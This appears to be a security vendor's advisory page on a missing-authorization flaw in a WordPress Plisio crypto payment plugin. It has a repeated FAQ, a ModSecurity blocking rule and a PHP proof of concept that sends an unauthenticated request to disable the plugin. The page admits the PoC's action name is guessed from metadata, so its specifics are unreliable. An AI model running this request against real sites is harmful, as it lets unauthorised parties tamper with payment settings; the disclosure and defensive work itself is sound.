What is CVE-2026-6372?

CVE-2026-6372 is a vulnerability in the Accept Cryptocurrencies with Plisio plugin for WordPress, specifically in versions up to 2.0.6. It is classified as a Missing Authorization flaw, allowing unauthenticated attackers to perform unauthorized actions due to a lack of capability checks.

How does this vulnerability work?

The vulnerability allows attackers to send crafted HTTP POST requests to the WordPress admin-ajax.php endpoint without proper authentication. Since the plugin does not verify user capabilities, attackers can execute functions that modify plugin settings or transaction states.

Who is affected by CVE-2026-6372?

Any WordPress site using the Accept Cryptocurrencies with Plisio plugin version 2.0.6 or earlier is affected. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Accept Cryptocurrencies with Plisio plugin installed. If it is version 2.0.6 or earlier, your site is at risk and should be updated immediately.

What is the severity level of this vulnerability?

CVE-2026-6372 has a CVSS score of 5.3, categorized as Medium severity. This indicates that while the vulnerability poses a risk, it does not have a critical impact on confidentiality or availability.

What does the CVSS score mean in practical terms?

A CVSS score of 5.3 suggests that the vulnerability can be exploited with low complexity and does not require authentication. This means that an attacker could potentially automate the exploitation without needing user interaction.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Accept Cryptocurrencies with Plisio plugin to the latest version that addresses the issue. Additionally, ensure that proper capability checks are implemented in the code for AJAX actions.

What should developers do to secure their code?

Developers should implement capability checks using functions like current_user_can() for any AJAX handlers that require administrative access. They should also use nonce verification to prevent cross-site request forgery.

What is the impact of this vulnerability?

An unauthenticated attacker can modify plugin settings, disable the plugin, or alter transaction states. However, there is no risk of data leakage or unauthorized access to sensitive information.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can exploit the vulnerability by sending a request to the vulnerable AJAX endpoint without authentication. It illustrates how the absence of capability checks allows unauthorized actions to be performed.

Is there a way to test for this vulnerability safely?

Security professionals can test for this vulnerability in a controlled environment by replicating the conditions outlined in the proof of concept. Ensure that testing is conducted on systems where you have explicit permission to avoid legal issues.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until a fix can be applied. Additionally, monitor your site for any unusual activity that may indicate exploitation attempts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2026-6372: Accept Cryptocurrencies with Plisio <= 2.0.6 – Missing Authorization (plisio-payment-gateway-for-woocommerce)

CVE ID CVE-2026-6372

Plugin plisio-payment-gateway-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.0.6

Patched Version —

Disclosed April 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6372 (metadata-based): This vulnerability affects the Accept Cryptocurrencies with Plisio WordPress plugin version 2.0.6 and earlier. It is a Missing Authorization flaw that allows unauthenticated attackers to perform an unauthorized action. The CVSS score is 5.3 (Medium) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating network-based, low-complexity attacks requiring no privileges or user interaction.

Root Cause: The CWE-862 classification implies a missing capability check on a function handler. Atomic Edge analysis infers that the plugin registers an AJAX action or REST endpoint without verifying user capabilities such as ‘manage_options’ or ‘edit_posts’. The CVSS ‘I:L’ (low integrity) suggests the unauthorized action allows modifying data, likely plugin settings or order statuses, but not reading sensitive information. Without a code diff, this is an inference from the CWE and description.

Exploitation: An attacker can send a crafted HTTP POST request to the WordPress admin-ajax.php endpoint with a specific action parameter. Based on the plugin slug and common patterns, the vulnerable action is likely ‘plisio_payment_gateway_for_woocommerce_action’ or a similar handler. The attacker can trigger the function without providing a valid nonce or authentication token, because the capability check is absent.

Remediation: The developer must add a capability check to the vulnerable function using current_user_can() or similar WordPress functions. For AJAX handlers that should be admin-only, the check should verify ‘manage_options’ or ‘edit_posts’ capability. The plugin should also implement nonce verification to prevent cross-site request forgery attacks.

Impact: An unauthenticated attacker can execute a specific action that modifies plugin data. The low integrity impact suggests the attacker might change payment gateway settings, disable the plugin, or alter transaction states. There is no confidentiality impact, so no data leakage occurs. The attack does not require user interaction and can be automated.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20266372,phase:2,deny,status:403,chain,msg:'CVE-2026-6372 - Missing Authorization in Plisio plugin AJAX handler',severity:'CRITICAL',tag:'CVE-2026-6372'" 
SecRule ARGS_POST:action "@streq plisio_payment_gateway_for_woocommerce_action" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6372 - Accept Cryptocurrencies with Plisio <= 2.0.6 - Missing Authorization

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL
$admin_ajax = $target_url . '/wp-admin/admin-ajax.php';

// The vulnerable AJAX action is inferred from plugin slug and common WordPress patterns.
// Plisio likely registers an action like 'handle_plisio_callback' or 'plisio_update_settings'.
// Without source code, we test the most common pattern: 'plisio_payment_gateway_for_woocommerce_action'
$action = 'plisio_payment_gateway_for_woocommerce_action'; // Adjust based on actual plugin

$payload = [
    'action' => $action,
    // Attacker might pass additional parameters like 'enabled', 'api_key', etc.
    // Based on inference: the unauthorized action could be 'update_plisio_settings'
    'plisio_enabled' => '0', // Disable the plugin as a test
    '_wpnonce' => '' // Nonce is omitted because check is missing
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_ajax);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body:n$responsen";

// Note: This PoC assumes the action name. If it fails, try other common action names:
// 'plisio_ajax_callback', 'plisio_admin_action', 'plisio_webhook'

Frequently Asked Questions

What is CVE-2026-6372?
Overview of the vulnerability
CVE-2026-6372 is a vulnerability in the Accept Cryptocurrencies with Plisio plugin for WordPress, specifically in versions up to 2.0.6. It is classified as a Missing Authorization flaw, allowing unauthenticated attackers to perform unauthorized actions due to a lack of capability checks.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send crafted HTTP POST requests to the WordPress admin-ajax.php endpoint without proper authentication. Since the plugin does not verify user capabilities, attackers can execute functions that modify plugin settings or transaction states.
Who is affected by CVE-2026-6372?
Identifying vulnerable installations
Any WordPress site using the Accept Cryptocurrencies with Plisio plugin version 2.0.6 or earlier is affected. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Accept Cryptocurrencies with Plisio plugin installed. If it is version 2.0.6 or earlier, your site is at risk and should be updated immediately.
What is the severity level of this vulnerability?
Understanding the risk
CVE-2026-6372 has a CVSS score of 5.3, categorized as Medium severity. This indicates that while the vulnerability poses a risk, it does not have a critical impact on confidentiality or availability.
What does the CVSS score mean in practical terms?
Interpreting the score
A CVSS score of 5.3 suggests that the vulnerability can be exploited with low complexity and does not require authentication. This means that an attacker could potentially automate the exploitation without needing user interaction.
How can I fix or mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Accept Cryptocurrencies with Plisio plugin to the latest version that addresses the issue. Additionally, ensure that proper capability checks are implemented in the code for AJAX actions.
What should developers do to secure their code?
Best practices for developers
Developers should implement capability checks using functions like current_user_can() for any AJAX handlers that require administrative access. They should also use nonce verification to prevent cross-site request forgery.
What is the impact of this vulnerability?
Potential consequences
An unauthenticated attacker can modify plugin settings, disable the plugin, or alter transaction states. However, there is no risk of data leakage or unauthorized access to sensitive information.
How does the proof of concept demonstrate the issue?
Understanding the demonstration
The proof of concept shows how an attacker can exploit the vulnerability by sending a request to the vulnerable AJAX endpoint without authentication. It illustrates how the absence of capability checks allows unauthorized actions to be performed.
Is there a way to test for this vulnerability safely?
Conducting security assessments
Security professionals can test for this vulnerability in a controlled environment by replicating the conditions outlined in the proof of concept. Ensure that testing is conducted on systems where you have explicit permission to avoid legal issues.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the plugin until a fix can be applied. Additionally, monitor your site for any unusual activity that may indicate exploitation attempts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations